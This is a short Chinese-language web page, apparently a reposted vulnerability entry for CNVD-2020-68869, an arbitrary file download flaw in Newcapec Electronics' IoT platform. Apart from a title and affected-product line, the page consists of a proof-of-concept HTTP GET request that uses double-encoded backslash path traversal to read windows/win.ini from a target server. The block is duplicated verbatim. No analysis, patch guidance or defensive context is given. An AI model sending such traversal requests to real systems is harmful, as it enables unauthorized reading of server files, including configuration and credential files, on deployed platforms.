CNVD-2020-68869_新開普電子股份有限公司_物聯網平台任意文件下載漏洞-棉花糖会员站

# CNVD-2020-68869 新開普電子股份有限公司物聯網平台任意文件下載漏洞

==漏洞影響==
新開普電子股份有限公司物聯網平台

==POC==

GET /api/device/foreignId//…%255c…%255c…%255c…%255c…%255c…%255c…%255c…%255cwindows/win.ini HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Encoding: gzip,deflate
Host: target:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive

==漏洞影響==

新開普電子股份有限公司物聯網平台

==POC==

GET /api/device/foreignId//…%255c…%255c…%255c…%255c…%255c…%255c…%255c…%255cwindows/win.ini HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Encoding: gzip,deflate
Host: target:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive

文章版权归作者所有，未经允许请勿转载。

THE END